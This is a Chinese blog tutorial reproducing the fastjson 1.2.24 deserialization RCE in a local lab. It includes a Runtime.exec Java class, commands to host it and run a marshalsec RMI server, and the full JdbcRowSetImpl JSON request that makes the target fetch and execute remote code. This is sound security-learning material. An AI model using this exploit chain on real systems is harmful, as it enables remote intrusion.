fastjson 1.2.24 反序列化导致任意命令执行漏洞 复现超详细步骤

已于 2022-07-05 14:53:32 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全
于 2022-07-05 12:32:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yc11223344/article/details/125616955
版权

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

在本地启动环境:虚拟机ip:8090
在这里插入图片描述

生成class文件

首先我们需要一个java的环境
新建文件夹并且在文件夹里面建一个txt文件命名为TouchFile.java,里面写入代码

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

cmd在文件夹目录运行

javac TouchFile.java

就会看到生成了一个class文件

安装maven

可以看一下这位师傅的文章

python开启http服务

python2.x执行命令为

python2 -m SimpleHTTPServer 8000

python3.x执行命令为

python -m http.server 8000

要在class文件下执行命令,进行监听8000端口
我们可以访问:本机ip:8000
在这里插入图片描述

开启RMI环境

我们借助marshalsec项目开启RMI服务,监听9999端口
marshalsec:https://github.com/mbechler/marshalsec
下载完marshalsec之后,进到该目录下cmd运行

mvn clean package -DskipTests

会生成一个target文件夹,里面又一个marshalsec-0.0.3-SNAPSHOT-all.jar文件说明已经配置成功了

在target文件夹cmd运行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://刚class文件的ip或域名:8000/#TouchFile" 9999

注:其中的ip也可以是本地的ip,在加上python监听的端口号

进行抓包验证

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://同上类文件地址:9999/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述
这个时候就可以进入docker容器中看一下有没有创建成功
docker ps查看一下id号,在docker exec -it id号 /bin/bash进入到容器中ls查看一下

大功告成

hang0c
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
下载和安装marshalsec
m0_54899775的博客
01-13 5360
下载和安装marshalsec
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
marshalsec安装教程--参考
weixin_54353204的博客
08-01 362
踩坑 - Kali下安装配置maven,完美解决!_kali安装maven_哈哥撩编程的博客-CSDN博客。下载和安装marshalsec_景天zy的博客-CSDN博客。Kali下安装配置maven,完美解决!_kali安装maven。下载和安装marshalsec_安装marshalsec
marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
最新发布
2301_79837041的博客
04-11 1736
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3011
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
09-14 1070
使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器。JNDI是java系统自带的api,用于访问ldap,rmi...的api,ldap和rmi是JNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器。Injection和。
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令...
探秘Marshalsec:Java安全研究的利器
gitblog_00030的博客
03-22 380
探秘Marshalsec:Java安全研究的利器 项目地址:https://gitcode.com/mbechler/marshalsec Marshalsec是一个开源项目,由开发者mbechler创建,专注于Java序列化相关的安全研究和漏洞利用。在信息安全领域,尤其是对于那些需要深入理解Java序列化机制的人来说,这是一个不可或缺的工具集。 项目简介 Marshalsec提供了多种Java序...
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 456
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
fastjson复现-详细
赵花花08042的博客
11-11 3081
https://vulhub.org/#/environments/fastjson/1.2.24-rce/ http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ https://www.freebuf.com/vuls/208339.
FastJson1.2.24漏洞复现(详细步骤)
qq_35713681的博客
07-28 342
此测试用的是VM搭的Kali 2023.2。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2172
Fastjson反序列化漏洞复现
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2469
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行
利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞
JiangBuLiu的博客
07-03 9062
Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试 Vulnhub官方复现教程 https://vulhub.org/#/environments/fastjson/vuln/ 漏洞原理 http://xxlegend.com/2017/04/29/title-%20fas...
fastjson 1.2.24/1.2.47漏洞复现
good good study
01-09 6195
当我们在渗透测试中,抓包的时候发现返回的流量内容存在json格式时,我们就可以想它是不是使用了fastjson
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值